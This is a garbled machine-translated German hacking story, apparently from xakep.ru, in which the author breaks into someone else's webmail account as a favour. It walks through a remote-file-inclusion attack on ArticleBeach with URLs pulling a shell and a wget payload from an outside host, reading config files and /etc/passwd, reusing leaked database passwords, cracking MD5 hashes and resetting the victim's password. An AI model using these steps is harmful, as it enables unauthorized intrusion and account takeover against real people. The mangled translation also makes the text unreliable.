Brechen Seife und Mailer

Es passiert , dass ich nie Hacking Seifen nahm. Aber dann kam ein verlockendes Angebot
von einem Bekannten, der verzweifelt Zugriff auf die gleiche Seife benötigt.
Unnötig Seife wurde auf einem kleinen Mailer * .co.uk entfernt.
Vertraute Brutus versucht Seife, aber es hat die Ergebnisse nicht gebracht, und er wandte sich an mich.
Auf den ersten prostmotrel ich selbst Mailer. Darüber hinaus geben die Fenster , um Ihre Login / Passwort, alle festen html.
Ich habe versucht , ein Passwort auf dem SQL-Injektion zu bilden, sondern zitiert gefiltert.
Server: Apache / 1.3.34 (Unix) PHP / 5.0.5 mod_auth_passthrough / 1.8 mod_log_bytes / 1.2 mod_bwlimited / 1.4 Frontpage / 5.0.2.2635 mod_ssl / 2.8.25 OpenSSL / 0.9.7a
Eine offene, Häfen Dienste auch nicht zufrieden.

Ich beschloss , zu prüfen, ob gehostet jemand anderes hier. Es wurde von ip gegebene Zahl ein paar Dutzend Seiten gefunden.
Ging auf sie, nur um sie drehte phpBB gepatcht, so dass keiner von der Exploit funktionierte nicht.
Und dann stieß ich auf das Produkt ArticleBeach www.articlebeach.com.
Die erste Anfrage:
http: //www.***.com/index.php page = http :? //durito.narod.ru/sh&cmd=ls%20-lpa
gab mir eine Liste von Dateien auf dem Server. ArticleBeach Programmierer sollten nicht ihr eigenes Brot und Butter essen.
polaziv Seite , die ich noch einen Fehler gefunden, freundlich links Entwickler ArticleBeach,
im Verzeichnis / includes / jeder Benutzer config.inc Datei anzeigen können , wie folgt:
Beispieldatei von den Site - Entwickler genommen ArticleBeach http://www.articlebeach.com/includes/config.inc
<?
global $ _cn;
global $ dbserver;
global $ db;
global $ dbuser;
global $ dbpass;

// MySQL - Datenbank - Server, Login, Passwort und Datenbankname
$ Dbserver = "localhost";
$ Database_connect = "article_art";
$ Dbuser = "article_jer";
$ Dbpass = "aaaaa";

$ Verbinden = mysql_connect ($ dbserver, $ dbuser, $ dbpass)
oder die ( "Konnte nicht verbinden MySQL");
mysql_select_db ($ database_connect, schließen $) ;


?>
Wie Sie wissen , ist es die Details der Zugriff auf den Datenbankserver.
Leider gibt es in meinem Fall habe das Passwort nicht in die Datenbank auf den FTP kommen,
neskazhesh was ist mit anderen Websites , auf denen es ein Produkt aus ArticleBeach ist.
Ich hatte durch den externen Server inkluda zu graben.
Öffnen / etc / passwd, konnte ich nicht den Namen des Mailer zu mir finden,
Login Benutzer und Domain - Namen stimmen nicht überein Sites.
Aber konnte die Web-Benutzerverzeichnis zu lesen: / home / * / public_html /
Schon wollte ich einen dumpfen Art durch alle von der Liste zu starten, aber entschieden accounting.log Datei zu überprüfen
dass speichert Benutzernamen und Domänennamen in der cPanel. Und sicher genug, habe ich eine Liste von Domain - Namen.
Ich entschied mich für das Recht und begann , das Web - Verzeichnis zu studieren. Finden Sie schnell die Details in den Quellcode der Datenbank MySQL zugreifen zu können :
'Datenbank' => '*** _ themail', // Name des MySQL - Datenbank
'Username' => '*** _ Postbote', // Der Benutzername und das Passwort ein, das
'Passwort' => 'jkretj3h45j'
Kennwort wieder kam nicht zum FTP.

Es bleibt nur zu der Datenbank zu klammern. Wir hatten für beschreibbare Verzeichnis oder eine Datei zu suchen.
Und wieder, Dank an die Entwickler ArticleBeach die seines Produkts auf das Verzeichnis / backup / drwxrwxrwx mit Rechte kümmerten.
http: //www.***.com/index.php page = http :? //durito.narod.ru/sh&cmd=wget -O Backup / sql.php http://durito.narod.ru/sql. php
und Feigen, die gleiche Sache mit GET, Links, zu holen, Luchs. Später erfuhr ich , dass wget laufen und GET PHP Sichere verboten, Links zu holen und Luchs abwesend gewesen.
Fortsetzung interne Prüfung von Host - Sites. Navyuzhival mehrere Passwörter in der Datenbank, aber sie auf den FTP nicht kommen zurück, alle Passwörter waren von Multi Abrakadabra.
Und plötzlich taiwanesische Website, sagte Intuition , es zu überprüfen und hier ist es - das Passwort auf die Datenbank zuzugreifen - anahol !!! Konekt zu FTP, übergeben und das Skript in die Arbeit mit Datenbanken von rst.void.ru gefüllt passieren.

Konekt Datenbank, finden Sie die richtige Tabelle und Dampleux es. Und hier ist die gehegten Seife, obwohl verschlüsselte Passwort MD5,
dies ist jedoch leicht behoben, wenn auch lange und trostlos. Aber zuerst habe ich beschlossen , den Hash zu http://md5.rednoize.com/ zu überprüfen, aber der Pass
und ich hatte nicht gefunden , es war schon bereit für eine lange Suche, aber dann bemerkt , dass die Antwort auf die Sicherheitsfrage, auch in MD5 verschlüsselt.


Punches auf md5.rednoize.com geheime Frage und hier ist sie : Cheung !!!


Ich komme nicht Mailer und die geheime Frage zu beantworten. Ich schlage vor , ein neues Passwort einzugeben und bestätigen. Schach und Matt!
Und mein Freund bekommt Zugang zu den begehrten Seife, nezabyv ich ausrollen Bier. Und ich in den Ruhestand seinen Schoß.

veröffentlicht am www.xakep.ru

Ihr Fehler Durito.
_________________
ESSEN SIE DIE REICHEN!

Erstellt 1996-2005 von Durito. Copyright 2006 by Durito
Alle Rechte vorbehalten